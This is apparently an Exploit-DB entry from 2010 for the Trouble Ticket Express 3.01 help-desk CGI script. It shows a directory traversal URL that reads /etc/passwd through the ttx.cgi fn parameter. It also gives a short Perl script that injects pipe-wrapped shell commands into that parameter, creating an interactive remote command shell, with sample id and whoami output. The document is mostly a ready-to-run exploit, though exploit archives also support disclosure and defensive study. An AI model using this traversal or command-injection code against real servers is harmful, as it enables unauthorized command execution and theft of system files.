Trouble Ticket Express 3.01 - Remote Code Execution / Directory Traversal

EDB-ID:

11723

CVE:



Author:

zombiefx

Type:

webapps


Platform:

CGI

Date:

2010-03-14


# Exploit Title: Trouble Ticket Express Remote Code Execution/Directory Traversal
# Author: zombiefx <darkernet@gmail.com<mailto:darkernet@gmail.com>>
# Software Link: http://www.troubleticketexpress.com/download/ttx301.zip
# Version: v3.01,v3.0,v2.24,v2.21
# Tested on: Linux
# CVE :
# Code:

# This is only possible if an attachment input is available.
# Directory Traversal Vuln is
# http://localhost/cgi-bin/ttx.cgi?cmd=file&fn=../../../../../../etc/passwd
# Simple perl code to run commands on the box
# $ id
# uid=0(httpd) gid=0(httpd) groups=0(httpd)
# $ whoami
# httpd

#!/usr/bin/perl
use warnings;
use strict;
use LWP::Simple;
my $url = 'http://localhost/cgi-bin/ttx.cgi';
print '$ ';
while (<>) {
    print get( $url . '?cmd=file&fn=|' . $_ . '|' );
    print '$ ';
}
<mailto:darkernet@gmail.com>